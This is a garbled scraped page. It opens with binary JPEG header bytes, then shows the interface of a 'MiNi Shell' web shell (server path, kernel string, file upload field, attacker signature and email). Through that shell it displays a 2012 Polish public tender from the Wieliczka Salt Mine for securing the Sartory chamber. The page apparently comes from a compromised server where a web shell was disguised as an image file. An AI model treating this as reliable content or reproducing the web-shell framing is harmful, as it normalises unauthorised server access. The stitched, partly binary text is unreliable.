JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/424864-N-2012.html

<p class="kh_header"><b>Wieliczka: Wykonanie koncepcji, analizy geomechanicznej i projektu technicznego zabezpieczenia komory Sartory poz. III</b><br>
<b>Numer ogłoszenia: 424864 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna - Górnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie koncepcji, analizy geomechanicznej i projektu technicznego zabezpieczenia komory Sartory poz. III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia.
1.1.	Przedmiotem zamówienia jest:
1)	opracowanie analizy geomechanicznej robót zabezpieczających komory Sartory 
poz. III, zwanej dalej Analizą geomechaniczną,
2)	wykonanie studium historyczno-konserwatorskiego zwanego dalej Studium,
3)	opracowanie koncepcji robót zabezpieczających komory Sartory poz. III, zwanej dalej Koncepcją,
4)	sporządzenie wstępnego przedmiaru robót i wstępnego kosztorysu dla zakresu rzeczowego prac, wynikającego z Koncepcji,
5)	wykonanie projektu technicznego na wykonanie prac zabezpieczających komory Sartory poz. III, zwanego dalej Projektem technicznym,
6)	opracowanie przedmiaru robót i kosztorysu inwestorskiego dla prac objętych  Projektem technicznym,
7)	sprawowanie nadzoru autorskiego w trakcie realizacji prac ujętych w opracowanym Projekcie technicznym.
1.2.	Przedmiot zamówienia winien być wykonany zgodnie z zaleceniami konserwatorskimi z dnia 8 czerwca 2010 r., znak: OZKr.JCH.562-830/10, stanowiącymi załącznik nr 1 do specyfikacji.

2.	Analiza geomechaniczna.
Analiza geomechaniczna winna określać naprężenia i wytężenia w filarach i stropie komory Sartory poziom III oraz w wyrobiskach otaczających

3.	Studium historyczno-konserwatorskie.
Studium historyczno-konserwatorskie należy opracować pod kątem zabezpieczenia komór i powinno zawierać następujące dane:
1)	powstanie i zmiany wyrobisk,
2)	funkcjonowanie i wyposażenie wyrobiska w ujęciu historycznym,
3)	walory zabytkowe,
4)	aktualny stan zachowania substancji zabytkowej w wyrobiskach,
5)	wytyczne historyczno-konserwatorskie dla robót zabezpieczających, określające w szczególności sposób korzystania z wyrobisk, jego zabezpieczenia i wykonania prac konserwatorskich, a także zakres dopuszczalnych zmian.

4.	Koncepcja.
4.1.	Zakres zakładanych w Koncepcji robót górniczych w rejonie komory Sartory 
poz. III, winien uwzględnić Analizę geomechaniczną, przy założeniu maksymalnego odtworzenia historycznego stanu komory, a konieczne ingerencje górnicze wynikać powinny jedynie ze względów bezpieczeństwa, przy maksymalnej ochronie stanowiska dokumentacyjnego przyrody nieożywionej Nr 35.B/8 usytuowanego w podłużni Hauer.
4.2.	Opracowana przez Wykonawcę Koncepcja podlegać będzie zaopiniowaniu przez Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie. W tym celu Zamawiający złoży stosowny wniosek.
4.3.	Wykonawca jest zobowiązany współpracować z Zamawiającym w zakresie opiniowania Koncepcji przez Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie.
4.4.	Wykonawca zobowiązany jest do dokonywania zmian, uzupełnień i poprawek Koncepcji w zakresie wskazanym przez Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie i zaaprobowanym przez Zamawiającego.

5.	Wstępny przedmiar robót i wstępny kosztorys inwestorski.
5.1.	Wykonawca jest zobowiązany sporządzić wstępny przedmiar robót i wstępny kosztorys inwestorski dla zakresu rzeczowego prac, wynikającego z Koncepcji.
5.2.	Formę wstępnego przedmiaru robót i wstępnego kosztorysu inwestorskiego Wykonawca jest zobowiązany uzgodnić z Zamawiającym.

6.	Projekt techniczny.
6.1.	Projekt techniczny powinien zawierać w szczególności:
a)	cel i zakres prac projektowanych,
b)	opis budowy geologicznej i warunków hydrogeologicznych rejonu zabezpieczanych wyrobisk,
c)	charakterystykę zagrożeń naturalnych i spodziewanych zaburzeń geologicznych,
d)	sposoby zabezpieczenia przed zagrożeniami,
e)	rodzaj i typ obudowy,
f)	wentylację rejonu robót,
g)	rodzaj i typ maszyn, urządzeń, instalacji i materiałów,
h)	zasady organizacji pracy i nadzoru robót,
i)	wnioski i zalecenia,
j)	załączniki mapowe.
6.2.	Projekt techniczny winien spełniać wymogi przepisów ustawy z dnia 9 czerwca 2011 r. Prawo geologiczne i górnicze oraz przepisów wykonawczych do tej ustawy.
6.3.	Projekt techniczny powinien zawierać wytyczne dla technologii robót (z założeniem uwarunkowań technicznych w Kopalni Soli Wieliczka) oraz założenia dotyczące jakości materiałów.
6.4.	W Projekcie technicznym należy zaprojektować drogi dostawy materiałów 
do przebudowanego wyrobiska oraz odstawy urobku. 
6.5.	Na etapie sporządzania Projektu technicznego należy prowadzić ocenę i optymalizację kosztu planowanych rozwiązań projektowych. Do Projektu technicznego należy dołączyć analizę możliwych opcji realizacyjnych, w aspekcie ich kosztu wykonania, wraz z uzasadnieniem opcji wybranej do realizacji.
6.6.	Na wykonanie prac objętych Projektem technicznym Zamawiający wystąpi 
z wnioskiem o uzyskanie decyzji w sprawie pozwolenia do Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie. Wykonawca jest zobowiązany współpracować z Zamawiającym w powyższym zakresie.
6.7.	Wykonawca zobowiązany jest do dokonywania zmian, uzupełnień i poprawek opracowanego Projektu technicznego w zakresie wskazanym przez Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie i zaaprobowanym przez Zamawiającego. Jeżeli zmiany, uzupełnienia lub poprawki spowodują potrzebę dokonania zmian, uzupełnień lub poprawek przedmiaru robót lub kosztorysu inwestorskiego, Wykonawca zobowiązany jest wprowadzić stosownie zmiany, uzupełnienia lub poprawki.

7.	Przedmiar robót i kosztorys inwestorski.
7.1.	Wykonawca jest zobowiązany sporządzić przedmiar robót i kosztorys inwestorski w układzie kosztów rodzajowych (R+M+S) dla poszczególnych czynności przewidzianych Projektem technicznym zgodnie z Katalogiem czynności wykonywanych przy pracach zabezpieczających i likwidacyjnych w Kopalni Soli Wieliczka, zwanym dalej Katalogiem, stanowiącym załącznik nr 2 do specyfikacji. W przypadku występowania w strukturze podziału projektowanych prac czynności 
nie ujętych w Katalogu, Wykonawca winien o tym powiadomić Zamawiającego.
7.2.	Kosztorys inwestorski należy wykonać w układzie tabelarycznym zgodnym ze wzorem stanowiącym załącznik nr 3 do specyfikacji.

8.	Nadzór autorski
8.1.	Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego.
8.2.	Wykonawca będzie zobowiązany do pełnienia nadzoru autorskiego w ilości maksymalnej 100 godzin.
8.3.	Nadzór autorski będzie sprawowany na zlecenia Zamawiającego. Zlecenia wykonywania nadzoru autorskiego zależeć będą od potrzeb Zamawiającego. Oznacza to, że Zamawiający może zrezygnować z całości lub z części wymiaru godzin (prawo opcji).
8.4.	Zlecenie wykonania nadzoru autorskiego nastąpi co najmniej na 2 dni robocze przed określonym przez Zamawiającego terminem wykonania nadzoru. Zlecenie wykonania nadzoru następować będzie pisemnie. Pisemne zlecenie zostanie jednocześnie przekazane faksem na numer wskazany przez Wykonawcę. Równocześnie Zamawiający poinformuje Wykonawcę o zleceniu telefonicznie. W sytuacjach szczególnych, wymagających niezwłocznej obecności autora projektu na terenie prowadzenia robót, osoba pełniąca nadzór autorski obowiązana jest wykonać nadzór autorski w dniu powiadomienia. W takim wypadku zlecenie wykonania nadzoru autorskiego może nastąpić telefonicznie z późniejszym pisemnym potwierdzeniem dokonania zlecenia.
8.5.	Nadzór autorski będzie wykonywany w ramach nie więcej niż 12 pobytów na terenie wykonywanych prac.
8.6.	W ramach nadzoru autorskiego inwestycji Wykonawca zobowiązany jest do:
1)	czuwania w toku realizacji robót nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z Projektem technicznym. W przypadku dopuszczenia przez Zamawiającego, zastosowania materiałów i urządzeń o parametrach nie gorszych niż przedstawione w Projekcie technicznym - kontrolować parametry tych materiałów i urządzeń,
2)	uzupełniania lub zmiany Projektu technicznego, a także przedmiaru robót i kosztorysu inwestorskiego dla prac objętych Projektem technicznym,
3)	wyjaśniania Wykonawcy prac objętych Projektem technicznym wątpliwości powstałych w toku jego realizacji,
4)	udziału w naradach technicznych,
5)	udziału w odbiorze poszczególnych, istotnych części robót oraz odbiorze końcowym.
Szczegółowe informacje dotyczące przedmiotu zamówienia i zasad jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 8 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 5 000,00 zł należy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie wykonania w okresie 
ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi, polegającej na wykonaniu projektu technicznego w zakresie podziemnych robót górniczych w zakładach górniczych, w których były lub są eksploatowane inne kopaliny niż węgiel kamienny, o wartości nie mniejszej niż 100 000,00 zł brutto, 
z podaniem podmiotu, na rzecz którego świadczona była usługa, jej wartości, przedmiotu, daty wykonania i odbioru oraz załączeniem dokumentów potwierdzających, że usługa ta została wykonana należycie (np.: referencje, protokoły odbioru)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w ust. 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Dopuszcza się możliwość dokonania istotnych zmian postanowień niniejszej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)	przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
2)	działania siły wyższej,
3)	zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3.	Zaistnienie przyczyn, wymienionych w ust. 2, nie powoduje powstania u żadnej ze stron niniejszej umowy, roszczenia o zmianę umowy.
4.	W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w ust. 2, każdej ze stron niniejszej umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę niniejszej umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2)	uzasadnienie dokonania zmiany umowy,
3)	projekt zmiany umowy.
5.	Wystąpienie, o którym mowa w ust. 4 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6.	Zmiana umowy  wymaga zachowania formy pisemnej pod rygorem nieważności.
7.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
8.	Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
9.	Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza 
o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> KOPALNIA SOLI WIELICZKA Spółka Akcyjna
32-020 WIELICZKA, Park Kingi 1, Dział Zamówień Publicznych, pokój A9, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 11:30, miejsce: KOPALNIA SOLI WIELICZKA Spółka Akcyjna
32-020 WIELICZKA, Park Kingi 1, Sekretariat Zarządu - budynek A2, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com